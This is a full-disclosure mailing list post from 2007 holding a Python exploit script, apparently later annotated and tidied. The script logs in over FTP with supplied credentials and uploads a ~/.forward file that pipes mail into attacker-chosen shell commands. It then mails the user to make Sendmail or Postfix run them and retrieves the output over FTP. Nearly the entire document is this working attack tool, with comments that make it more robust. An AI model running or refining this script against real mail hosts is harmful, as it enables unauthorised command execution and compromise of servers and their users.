[Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
- From: "kcope" <kingcope@xxxxxxx>
- Date: Fri, 14 Dec 2007 03:57:45 +0100
exploiting "features" - the attached script does not attack a flaw in the MTA itself. It uploads a ~/.forward file through an FTP account whose login directory is the user's home, then mails that user so sendmail/postfix pipes the message into the command(s) listed in the file. Valid FTP credentials are required, so this is post-authentication command execution on the mail host rather than an unauthenticated remote exploit.
(see attached)
- -kcope / 2007
#!python
# (C) 2007 kcope production
import ftplib
import smtplib
import socket
import sys
from ftplib import FTP
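print("Sendmail/Postfix FORWARD Remote Exploit")
print("kcope/2007 - hey alex,andi")

# Usage: skyline.py <hostname> <ftp username> <ftp password>
# The FTP account must be able to write into its login directory, which the
# script assumes is the home directory the MTA reads ~/.forward from.
# NOTE: the password is passed on the command line and is therefore visible to
# every local user through the process list (ps, /proc).
if len(sys.argv) != 4:
    sys.stderr.write("usage: skyline.py <hostname> <ftp username> <ftp password>\n")
    sys.exit(1)  # non-zero so a wrapper can tell a usage error from success

hostname = sys.argv[1]  # target; FTP (21) and SMTP (25) are expected on this same host
username = sys.argv[2]  # FTP user; also the local mailbox the trigger mail is sent to
password = sys.argv[3]

print("[+] INITIAL FTP STOR")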
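def FTPconnect(initial):
    """Upload the local ``.forward`` file to the target over FTP.

    The file is stored as ``.forward`` in the FTP login directory; the script
    relies on that directory being the home directory the MTA consults for
    ``~/.forward``.

    Args:
        initial: if true, the local ``.forward`` is first (re)written with a
            harmless probe entry (``|touch /tmp/XXX``); if false, the file
            prepared by the caller is uploaded unchanged.

    Exits the process with status 1 on any FTP, socket or local-file error.
    The underlying exception is printed so that a wrong password can be told
    apart from, say, a refused connection or a non-writable directory.
    """
    ftp = None
    try:
        if initial:
            with open(".forward", "wb") as probe:
                probe.write(b"|touch /tmp/XXX\n")
        ftp = FTP(hostname)
        print(ftp.getwelcome())
        ftp.login(username, password)
        with open(".forward", "rb") as fwd:
            ftp.storbinary("STOR .forward", fwd)
        ftp.quit()
    except ftplib.all_errors as exc:
        # Only FTP/socket/file errors are caught: the original bare ``except``
        # also swallowed SystemExit and KeyboardInterrupt and hid the cause.
        print("[-] FTP Error. Correct Login Credentials ? (%s)" % (exc,))
        sys.exit(1)
    finally:
        if ftp is not None:
            ftp.close()  # no-op after quit(); releases the socket if quit() was never reached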
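FTPconnect(True)  # probe upload: proves the login works and .forward is writable


def _forward_entries(commands):
    """Build the ``.forward`` lines for ``commands`` (a non-empty list of strings).

    Each entry pipes the delivered mail into a shell command whose stdout goes
    to ``~/RESULTS``; the first entry truncates that file with ``>`` so nothing
    from an earlier run survives, the rest append with ``>>``.  The command
    text is placed between double quotes verbatim, so a command that itself
    contains ``"`` breaks the entry -- escape it before typing it in.
    """
    lines = ['|"' + commands[0] + '> ~/RESULTS"\n']
    for cmd in commands[1:]:
        lines.append('|"' + cmd + '>> ~/RESULTS"\n')
    return lines


print("[+] PLEASE ENTER COMMANDS TO EXECUTE")
print("[+] sendmail allows a single command")
print("[+] postfix allows many")
print("[+] END WITH . IN A SINGLE LINE")

# Read commands until a lone "." or EOF.  (The original kept them in a
# variable named ``input``, shadowing the builtin, and wrote a bogus
# ``|".> ~/RESULTS"`` entry when "." was the very first line.)
commands = []
while True:
    line = sys.stdin.readline()
    if not line:
        break  # EOF before the "." terminator
    line = line.strip()
    if line == ".":
        break
    commands.append(line)

if not commands:
    print("[-] No commands entered, nothing to upload")
    sys.exit(1)

# Write the real .forward.  The probe uploaded by FTPconnect(True) above is
# overwritten here before any mail is sent, so its ``touch /tmp/XXX`` only
# ever runs if a message happens to arrive for the user in between.
with open(".forward", "wb") as fwd:
    fwd.writelines(_forward_entries(commands))

print("[+] FTP STOR")
FTPconnect(False)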
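print("[+] EXPLOITING BOX")

SMTP_TIMEOUT = 30  # seconds; without it a half-open port 25 hangs the tool forever


def _banner_hostname(greeting):
    """Return the first word of the SMTP 220 greeting text (the server's name).

    ``greeting`` is the text after the ``220 `` code as returned by
    ``smtplib.SMTP.connect`` -- ``str`` on Python 2, ``bytes`` on Python 3.
    Raises ``smtplib.SMTPException`` if the greeting has no words at all; the
    original slice ``smtpline[4:smtpline.find(" ", 5)]`` silently produced a
    truncated name (including the trailing CR) when the banner had no second
    word.
    """
    words = greeting.split()
    if not words:
        raise smtplib.SMTPException("no hostname in SMTP banner: %r" % (greeting,))
    name = words[0]
    if not isinstance(name, str):
        name = name.decode("ascii", "replace")
    return name


# Deliver one (empty) message to the FTP user's local mailbox.  When the MTA
# processes ~/.forward for that user it pipes the message into the command(s)
# uploaded above.  Sender and recipient are both <username>@<banner host>,
# the name the server announces itself with, so delivery stays local as long
# as the MTA treats that name as one of its own domains.
# smtplib raises on any non-2xx reply.  The original raw-socket version read
# every reply but never checked it, so a rejected RCPT or DATA went unnoticed
# and only surfaced later as a missing RESULTS file.
smtp = None
try:
    smtp = smtplib.SMTP(timeout=SMTP_TIMEOUT)
    code, greeting = smtp.connect(hostname, 25)
    print("%s %s" % (code, greeting))
    smtphostname = _banner_hostname(greeting)
    address = username + "@" + smtphostname
    smtp.helo("eyecandy")  # plain HELO, as the original did; sendmail() will not re-greet
    smtp.sendmail(address, [address], "")
    smtp.quit()
except (smtplib.SMTPException, socket.error, EOFError) as exc:
    print("[-] EXPLOTATION Error. Is sendmail/postfix running ? (%s)" % (exc,))
    sys.exit(1)
finally:
    if smtp is not None:
        smtp.close()  # no-op after quit(); closes the socket if an error cut the session short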
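print("[+] RETRIEVING RESULTS")

# Fetch ~/RESULTS (stdout of the piped command(s)) back over FTP, then remove
# it from the target.  ``retrlines`` only streams lines to a callback; the
# original passed none, so ftplib printed the lines itself and the following
# ``open("RESULTS")`` then raised on a local file that was never written
# (outside any try, so the tool died with a traceback).  Collecting into a
# list gives a single, ordered printout.
# NOTE(review): mail delivery is asynchronous, so RESULTS may not exist yet
# when this runs; a "550 ... No such file" here usually means "try again",
# not "wrong credentials".
# NOTE(review): the uploaded ~/.forward is *not* removed here, so the piped
# command(s) run again on every later mail delivered to this user until it is
# deleted by hand (or with a further ``ftp.delete(".forward")``).
results = []
ftp = None
try:
    ftp = FTP(hostname)
    print(ftp.getwelcome())
    ftp.login(username, password)
    ftp.retrlines("RETR RESULTS", results.append)
    ftp.delete("RESULTS")
    ftp.quit()
except ftplib.all_errors as exc:
    print("[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / "
          "postfix accepting messages ? (%s)" % (exc,))
    sys.exit(1)
finally:
    if ftp is not None:
        ftp.close()  # no-op after quit(); releases the socket on the error path

for line in results:
    print(line)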